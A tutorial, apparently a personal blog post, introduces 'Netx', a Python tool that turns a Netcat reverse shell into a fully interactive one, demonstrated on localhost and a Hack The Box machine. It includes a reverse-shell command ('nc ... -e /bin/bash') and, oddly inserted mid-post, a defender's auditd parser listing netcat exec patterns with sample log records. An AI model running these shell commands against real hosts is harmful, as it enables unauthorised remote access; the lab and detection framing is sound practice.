INTRO
I am back with a new Python script. In this tutorial, we will try to gain interactive shell access without typing any commands on the remote host; I will leave that to my script. We will look at what the script is actually doing, and then do the same manually. You can tell me about any errors and bugs you face while using the script. You can also donate to me via Paytm (+91 9828654788). Netx has some extraordinary features which make it different from any other script. By the way, there is no other script like Netx available, and that is why I decided to write this Python script. I know it would be a lot better as a shell script, but I don’t like writing such long scripts in shell.
Requirements
• Linux machine (Remote host)
• Netcat
• Kali Linux (Attacker, recommended)
• Python3
Honestly, I have never used this script on any Linux distribution other than Kali Linux. But you can try it on other Linux distributions, and please tell me if you encounter any errors.
SCRIPT
First, download the script to your local system with Git. Type this command:
git clone https://github.com/luckythandel/netx.git
You can also visit the GitHub page to see screenshots and more details about Netx. I have released a binary file too; you can download it from the Netx GitHub page.
After downloading it to your Linux machine, install the requirements before running it. Type this command:
pip3 install -r requirements.txt
Now the script is ready to run. Let’s see what we have with the -h flag. Type this command:
python3 netx.py -h
I have just added the -p flag to define the port on which the Netcat listener will be started.
Let’s run it without any flag and see what happens. Type this command:
python3 netx.py
Look, it asks for the port when I don’t use the -p flag. It is programmed that way: the port_define function takes care of it.
Let’s run it with the -p flag. Type this command:
python3 netx.py -p 1234
So, the listener is started on the defined port, and obviously you can choose another port. Now let’s send it a request. I am running this on my localhost, so I will use 127.0.0.1 as the IP. Type this command:
nc 127.0.0.1 1234 -e /bin/bash
I used another account so that you can see the difference between a real shell and the shell that we want to get.
We can see two options:
“Y” : Let You Handle Commands
“N” : Let The Script Handles Commands
If you want to handle every command before it is run, type “Y”, or choose “N” to do everything automatically. Let’s select “Y” first.
Select python2 or python3. This is useful when the remote host doesn’t have one of the Python versions.
Let’s select python3: type 2.
Type “Y”. If you choose “N” instead, it will let you interact with the shell without running the shown command.
Choose “Y”, and it will ask you for the terminal type.
But this time you can choose “n” only if you are running it on your local network.
You will see that you have a fully interactive shell. You can use the arrow keys, clear the terminal, and do some other things.
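From the defender's side, the nc ... -e /bin/bash callback used in the local test above shows up in process-execution telemetry. The following is an added example, not part of Netx or the original post: it parses auditd EXECVE records and reports netcat invocations that attach a program to the socket. The sample records are constructed and the function names are hypothetical.

```python
import os
import re

# Constructed auditd EXECVE records (sample data, not from the original page).
SAMPLE_LOG = """\
type=EXECVE msg=audit(1700000000.101:501): argc=5 a0="nc" a1="127.0.0.1" a2="1234" a3="-e" a4="/bin/bash"
type=EXECVE msg=audit(1700000000.202:502): argc=3 a0="nc" a1="-lvnp" a2="1234"
type=EXECVE msg=audit(1700000000.303:503): argc=5 a0="/usr/bin/ncat" a1="10.0.0.5" a2="1234" a3="-c" a4=2F62696E2F7368202D69
type=SYSCALL msg=audit(1700000000.303:503): arch=c000003e syscall=59 success=yes
"""

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional"}
EVENT_RE = re.compile(r"msg=audit\([\d.]+:(\d+)\)")
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|((?:[0-9A-Fa-f]{2})+))')
SHORT_EXEC = re.compile(r"-[A-Za-z]*[ec]")  # -e, -c, or a cluster ending in one

def parse_execve(line):
    """Return (event_id, argv) for an EXECVE record, or None for other lines."""
    event = EVENT_RE.search(line)
    if "type=EXECVE" not in line or not event:
        return None
    args = {}
    for idx, quoted, hexed in ARG_RE.findall(line):
        # auditd hex-encodes arguments that contain spaces or quotes
        args[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace") if hexed else quoted
    return event.group(1), [args[i] for i in sorted(args)]

def netcat_exec_target(argv):
    """Return the program netcat is told to attach to the socket, else None."""
    if not argv or os.path.basename(argv[0]) not in NETCAT_NAMES:
        return None
    for i, arg in enumerate(argv[1:], start=1):
        if arg.startswith(("--exec=", "--sh-exec=")):
            return arg.split("=", 1)[1]
        if arg in ("--exec", "--sh-exec") or SHORT_EXEC.fullmatch(arg):
            return argv[i + 1] if i + 1 < len(argv) else ""
    return None

def scan(log_text):
    """Return [(event_id, program)] for every netcat exec found in the log."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_execve(line)
        target = netcat_exec_target(parsed[1]) if parsed else None
        if target is not None:
            hits.append((parsed[0], target))
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Flag meanings differ between netcat implementations, so a hit is a triage lead to correlate with the parent process and the network connection, not a verdict on its own.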
But let’s use it on an HTB machine instead of on our local system. I will not spoil anything. This time we will let the script handle everything.
So, let’s use Netcat first, just to be sure that the shell is not interactive. I have started a listener on port 1234, and after executing my payload on that machine, we get a response.
As you can see, we just got this ugly shell from the box. Now let’s use Netx, but as I said, I will let the script handle everything this time.
Now when I hit Enter, it will take some time to run the commands properly. After running some commands, it will ask whether you want to change the terminal size. Let me show you what that means. If you type “n” so that the terminal size is not changed, you will see output like this:
The size of the shell will match the default size of the terminal in which it is opened. But if you want to change the terminal size, you can type “Y”.
Now let’s open nano and see whether the terminal size has changed.
By the way, it also asks which user you want to switch to after getting an interactive shell. It asks for the user after the terminal size.
Well, that is what I created for you guys. I hope you will consider using it in the future. By the way, please tell me what else I should create with Python. Of course, I will do it for free, but it will take me some time.
Thanks For Visiting.